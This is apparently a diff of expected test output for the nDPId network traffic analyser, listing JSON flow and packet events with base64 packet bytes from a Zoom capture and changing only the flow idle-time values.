00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469189,"flow_last_seen":1569520469189,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569520469189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABICu4AAEAR5YzAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569520469200,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469200,"pkt":"EBMx8Tl2KDc3AG3ICABFAABISukAAEARpZHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} -00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569520469210,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469210,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIjkkAAEARYjHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569520469189,"flow_last_seen":1569520469210,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469210,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -63,14 +63,14 @@ 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569520469264,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469264,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIADMAAEAR70fAqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569520469274,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIzF0AAEARIx3AqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469340,"flow_last_seen":1569520469340,"flow_idle_time":7440000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":1,"thread_ts_msec":1569520469340,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569520469340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1569520469340,"pkt":"EBMx8Tl2KDc3AG3ICABFAAE7AABAAEAGza7AqAF1aMdBKtJrAFCnuOoZVolcQYAYEADYHwAAAQEICiWc2yOz1c0BjkVSpFLY1xT06OSrjoriJgcfK\/\/jFeJ0MBFnTs\/gjSBBTilLonupmCKu9pPH3O3kr0WdmS15RGnoT780kKdV0pI3Sc4BmoL3SDuD+4AKh61lYz9\/Fy+NoN7yg5wYBt1EyrpPMLbLqHBNHL\/bSEl7ELs0VVSBp\/yK5KmmCJ9NxlFB5OhyVsIKKMN16tHZjCMzvfXD8zzASLDMp2Jgo7P\/WwPcHOM+42RSXjbuLZ5ok2AmF+hLRIKzRuPPREeQ7vQwmpDzjOHW9Sf++k9YwzgVZySXAtDkgpGRg+YDLvXpKGuHNj5xgws4SOHXAFvt3QGUXS4yo6IYy8o0BGkEyJuTk1MEHV6JN74="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7440000,"flow_min_l4_payload_len":1368,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1368,"flow_avg_l4_payload_len":1368,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569520469341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1434,"pkt_l4_len":1400,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAWMAABAAEAGb1\/AqAF1I7rgNdJwAbu\/4X6L2uaJRIAQEAC3VgAAAQEICiWc2ySFp5bjFwMDBZ4AAAAAAAAAkgusoLvJ6vSttM3Q7UxWnNoYus44vvH4fsNNbl6rpvk6OYpGeuvwflaMmUGTYIrirttSlsO38H0GA7wE0xtelFBUIqtPaG2zLaELN02TEy8tUFQrsrqVaYUsCYJ2hIqsiRr8HUVz8JaKDjyEbW\/6SDuFmHrK8XtHElqv0awJOAEmL3KNt0jVBWwHCGEFsZPcfO1pHuuoiBuup3wZUBRnIJST+dFPme0TV6vJ+IxOjx\/mA8fFWqQdV0lKttFkpnySiRxX5yrxpipVJy4p7z67+kAmdWhmjAbJ0jKiyDw+DcyTkynUokZHprab8MCYp\/TQx3xlQiW8+bdGrifHDAXawAfxdyEnxRfDIbdQKLwqUd3q\/7pZfr\/4d1tUDgm0WlajX7mPfF9WlQlsZCy+ChrMLq6KB65LC24miZN0Oh\/kWW3n1lqgTdT6wyEHUQbhN7aMRFDURjgWnZBDWn4PrH7p5zNvQSTu1\/tX7DHH9FI+E\/S8F73db4ge7KXn\/dETNp0MT++lGzZNvQ8tP2HIXFPFo1PFoNApoahzcRPgbV1rmTnmuWdwR6k9v2rQ51IRkvomJ5+TW8zK\/T3dpZj8bQ2ZXFOOqjyv1+mdfNtQelTeuF+xFuT9k3w43crUkirHNjO6HDcTH8g5iwOfX\/P5Ze+j2MahTCw4IqO2cgO0GUqqgaRqFgkBd4qtJfEyTzJvn2QyDNF8nXiqgRtiC89ltDf6sKzt1TUcglqiIso29y4WBLLmAnOlHxC5COmZYEu0CraDE3vjq3Eo6QVYa5U+p4OKJ9K9r563eLKRSjLRb\/GJwoU19nJfa5zVERWEq0IToF\/rMA7vLUy3muT3dZmJxkOsSuFN\/Usyd+T412g2p1ZdXXnKqATMbFhbdBtC\/y58N+Ld\/82QR9uhyJTGIl+G7bL56l07dPTLTdZ8Usdj23buwPw30vMgmi+E2m8MN9Y502dlBs94rGej8il7sUNS4pRHgYLTyWg6cZyS8AsHVWXff0sHuCuhPPV8M5EKNXzyntJ0gexz8gHMiqPY4NI0Ni\/OneEqQ4C8E6uqXvI2kcZ2BOG\/p4MX8o3AIWp7ayyFuWOJxi2lw6TEu8NuHHmGI4kv4FI3\/kgSQc6sf3SB44BSo3k4njWMAfAGbStQzO7TdByZBgUmqKdUtWCav3gJeVcsVZvgE+oEb2RNn0kn49ZouFmtBZa4MHnF81Rig78AE6ulpakr3aQ66b3O\/vtpHtpLOQcnjEQ\/qS+\/M1GayjxpQWCXEP02WwpvuLolzsWcvLf0N4iVpkzaVwjd0PnTczMC0nRmMJNbIBUnjIjJ5eKWfHSbRJbj\/MtVxqJwc8zwost2cccITh0lHc81zUSBD7GSF5b9zV7g2B0N4HfRanVjZhq4\/wraioSAC+795Umn4JCnMPSUAwuEnGuY7\/qhVrVORRO8KqXtC5\/5m+ff6XLy24O2WsPRzzPmP37Tt6opYkQlNaCU6f6MSh5leucVqZunkohryKjXGP2HU49rKyG4sSngfKn7U3ByAtKcO8nimiTP81z1QcgS2WUUKeZI5VJBPQ5toQ20MunmnQc+AjUHR7cCT28cN30m+ZL49Jt0RzL1N4yKvfdecf7UAMl9WG3IWewXXS8itIsi3DkAYv6t2MOlXE9XEWXdwxfePqJvzpR\/iHVQx\/6oobZRIQjxTbqoCvtXEg2uj6gJpcxIkn9+KrUGRl5tdROeMX0NbfZvt+g+tOcHvsvl+k5qrsiSB57D9TdRPsfMHD4AQRHjKQWksr1jHIvNkgNXnSPAu9+rrqEJ8piMP7LlZAKGZwhC"} -00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1569520469341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB\/AABAAEAGdGzAqAF1I7rgNdJwAbu\/4YPj2uaJRIAYEACuSgAAAQEICiWc2ySFp5bjD8rJVgENkhz7SGo+3tsT+62YMYedQzLcJKiig4pAH+hO24ZoiQ1LNK0ZidRBnPFEPrr+zH4y+BGqQ1wCDA9XJFEjegtqGmZzuBXv"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1569520469354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469354,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA07H8AAHcGkTcjuuA1wKgBdQG70nDa5olEv+GD44AQA\/fBegAAAQEICoWn6LklnNsk"} -00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569520469370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1569520469370,"pkt":"KDc3AG3IEBMx8Tl2CABFAABrxSVAADUGFFlox0EqwKgBdQBQ0mtWiVxBp7jrIIAYACoMGQAAAQEICrPWHtMlnNsjzR67t55lmahUyt3+F7wIZY40kmp5z0B6VTx\/VJbCVWp7syOQaUpp1Ik5I7MknMnzBR1VLfTDBg=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569520469370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469370,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGzrXAqAF1aMdBKtJrAFCnuOsgVolceIAQD\/4OlAAAAQEICiWc2z+z1h7T"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469340,"flow_last_seen":1569520469340,"flow_idle_time":7560000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":1,"thread_ts_msec":1569520469340,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569520469340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1569520469340,"pkt":"EBMx8Tl2KDc3AG3ICABFAAE7AABAAEAGza7AqAF1aMdBKtJrAFCnuOoZVolcQYAYEADYHwAAAQEICiWc2yOz1c0BjkVSpFLY1xT06OSrjoriJgcfK\/\/jFeJ0MBFnTs\/gjSBBTilLonupmCKu9pPH3O3kr0WdmS15RGnoT780kKdV0pI3Sc4BmoL3SDuD+4AKh61lYz9\/Fy+NoN7yg5wYBt1EyrpPMLbLqHBNHL\/bSEl7ELs0VVSBp\/yK5KmmCJ9NxlFB5OhyVsIKKMN16tHZjCMzvfXD8zzASLDMp2Jgo7P\/WwPcHOM+42RSXjbuLZ5ok2AmF+hLRIKzRuPPREeQ7vQwmpDzjOHW9Sf++k9YwzgVZySXAtDkgpGRg+YDLvXpKGuHNj5xgws4SOHXAFvt3QGUXS4yo6IYy8o0BGkEyJuTk1MEHV6JN74="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7560000,"flow_min_l4_payload_len":1368,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1368,"flow_avg_l4_payload_len":1368,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569520469341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1434,"pkt_l4_len":1400,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAWMAABAAEAGb1\/AqAF1I7rgNdJwAbu\/4X6L2uaJRIAQEAC3VgAAAQEICiWc2ySFp5bjFwMDBZ4AAAAAAAAAkgusoLvJ6vSttM3Q7UxWnNoYus44vvH4fsNNbl6rpvk6OYpGeuvwflaMmUGTYIrirttSlsO38H0GA7wE0xtelFBUIqtPaG2zLaELN02TEy8tUFQrsrqVaYUsCYJ2hIqsiRr8HUVz8JaKDjyEbW\/6SDuFmHrK8XtHElqv0awJOAEmL3KNt0jVBWwHCGEFsZPcfO1pHuuoiBuup3wZUBRnIJST+dFPme0TV6vJ+IxOjx\/mA8fFWqQdV0lKttFkpnySiRxX5yrxpipVJy4p7z67+kAmdWhmjAbJ0jKiyDw+DcyTkynUokZHprab8MCYp\/TQx3xlQiW8+bdGrifHDAXawAfxdyEnxRfDIbdQKLwqUd3q\/7pZfr\/4d1tUDgm0WlajX7mPfF9WlQlsZCy+ChrMLq6KB65LC24miZN0Oh\/kWW3n1lqgTdT6wyEHUQbhN7aMRFDURjgWnZBDWn4PrH7p5zNvQSTu1\/tX7DHH9FI+E\/S8F73db4ge7KXn\/dETNp0MT++lGzZNvQ8tP2HIXFPFo1PFoNApoahzcRPgbV1rmTnmuWdwR6k9v2rQ51IRkvomJ5+TW8zK\/T3dpZj8bQ2ZXFOOqjyv1+mdfNtQelTeuF+xFuT9k3w43crUkirHNjO6HDcTH8g5iwOfX\/P5Ze+j2MahTCw4IqO2cgO0GUqqgaRqFgkBd4qtJfEyTzJvn2QyDNF8nXiqgRtiC89ltDf6sKzt1TUcglqiIso29y4WBLLmAnOlHxC5COmZYEu0CraDE3vjq3Eo6QVYa5U+p4OKJ9K9r563eLKRSjLRb\/GJwoU19nJfa5zVERWEq0IToF\/rMA7vLUy3muT3dZmJxkOsSuFN\/Usyd+T412g2p1ZdXXnKqATMbFhbdBtC\/y58N+Ld\/82QR9uhyJTGIl+G7bL56l07dPTLTdZ8Usdj23buwPw30vMgmi+E2m8MN9Y502dlBs94rGej8il7sUNS4pRHgYLTyWg6cZyS8AsHVWXff0sHuCuhPPV8M5EKNXzyntJ0gexz8gHMiqPY4NI0Ni\/OneEqQ4C8E6uqXvI2kcZ2BOG\/p4MX8o3AIWp7ayyFuWOJxi2lw6TEu8NuHHmGI4kv4FI3\/kgSQc6sf3SB44BSo3k4njWMAfAGbStQzO7TdByZBgUmqKdUtWCav3gJeVcsVZvgE+oEb2RNn0kn49ZouFmtBZa4MHnF81Rig78AE6ulpakr3aQ66b3O\/vtpHtpLOQcnjEQ\/qS+\/M1GayjxpQWCXEP02WwpvuLolzsWcvLf0N4iVpkzaVwjd0PnTczMC0nRmMJNbIBUnjIjJ5eKWfHSbRJbj\/MtVxqJwc8zwost2cccITh0lHc81zUSBD7GSF5b9zV7g2B0N4HfRanVjZhq4\/wraioSAC+795Umn4JCnMPSUAwuEnGuY7\/qhVrVORRO8KqXtC5\/5m+ff6XLy24O2WsPRzzPmP37Tt6opYkQlNaCU6f6MSh5leucVqZunkohryKjXGP2HU49rKyG4sSngfKn7U3ByAtKcO8nimiTP81z1QcgS2WUUKeZI5VJBPQ5toQ20MunmnQc+AjUHR7cCT28cN30m+ZL49Jt0RzL1N4yKvfdecf7UAMl9WG3IWewXXS8itIsi3DkAYv6t2MOlXE9XEWXdwxfePqJvzpR\/iHVQx\/6oobZRIQjxTbqoCvtXEg2uj6gJpcxIkn9+KrUGRl5tdROeMX0NbfZvt+g+tOcHvsvl+k5qrsiSB57D9TdRPsfMHD4AQRHjKQWksr1jHIvNkgNXnSPAu9+rrqEJ8piMP7LlZAKGZwhC"} +00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1569520469341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB\/AABAAEAGdGzAqAF1I7rgNdJwAbu\/4YPj2uaJRIAYEACuSgAAAQEICiWc2ySFp5bjD8rJVgENkhz7SGo+3tsT+62YMYedQzLcJKiig4pAH+hO24ZoiQ1LNK0ZidRBnPFEPrr+zH4y+BGqQ1wCDA9XJFEjegtqGmZzuBXv"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1569520469354,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469354,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA07H8AAHcGkTcjuuA1wKgBdQG70nDa5olEv+GD44AQA\/fBegAAAQEICoWn6LklnNsk"} +00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569520469370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1569520469370,"pkt":"KDc3AG3IEBMx8Tl2CABFAABrxSVAADUGFFlox0EqwKgBdQBQ0mtWiVxBp7jrIIAYACoMGQAAAQEICrPWHtMlnNsjzR67t55lmahUyt3+F7wIZY40kmp5z0B6VTx\/VJbCVWp7syOQaUpp1Ik5I7MknMnzBR1VLfTDBg=="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569520469370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469370,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGzrXAqAF1aMdBKtJrAFCnuOsgVolceIAQD\/4OlAAAAQEICiWc2z+z1h7T"} 